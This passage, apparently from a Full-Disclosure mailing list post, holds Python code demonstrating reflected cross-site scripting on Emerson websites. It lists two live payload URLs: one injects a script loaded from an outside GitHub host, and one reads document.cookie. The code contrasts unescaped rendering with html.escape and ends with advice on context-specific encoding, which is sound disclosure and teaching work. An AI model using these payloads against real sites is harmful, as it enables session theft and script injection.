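    "http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E",
    "http://www.emersonnetworkpower.com/en-US/SearchCenter/Pages/AllResults.aspx?k=%3Cscript%3Ealert(document.cookie)%3C/script%3E&s=Network%20Power%20Content_en-US_en-US",
]


def reflected_param(url, name):
    """Value of query parameter `name`, percent-decoded as the server sees it."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_unsafe(value):
    """Constructed stand-in for the vulnerable page: the parameter is written
    into the HTML as-is."""
    return "<html><body><h2>Email this article: " + value + "</h2></body></html>"


def render_safe(value):
    """Same page with output encoding for the HTML text context; quote=True
    also covers the attribute context."""
    return ("<html><body><h2>Email this article: "
            + html.escape(value, quote=True) + "</h2></body></html>")


class _ScriptFinder(HTMLParser):
    """Collects the src of every <script> start tag the parser sees."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs).get("src"))


def injected_script_tags(body):
    """Parse like a browser: a payload that survived unencoded shows up as a
    real tag; an encoded one is text and yields nothing."""
    finder = _ScriptFinder()
    finder.feed(body)
    finder.close()
    return finder.scripts


if __name__ == "__main__":
    for url, param in ((PAYLOAD_URLS[0], "Title"), (PAYLOAD_URLS[1], "k")):
        value = reflected_param(url, param)
        print(param, "->", value)
        print("  unsafe:", injected_script_tags(render_unsafe(value)))
        print("  safe:  ", injected_script_tags(render_safe(value)))
```

Encoding has to match the context the value lands in: `html.escape` is right for element text and quoted attributes, but a value placed inside a `<script>` block or a URL needs JavaScript-string or URL encoding instead, and a value that is meant to carry markup needs an allow-list sanitiser rather than escaping.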

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/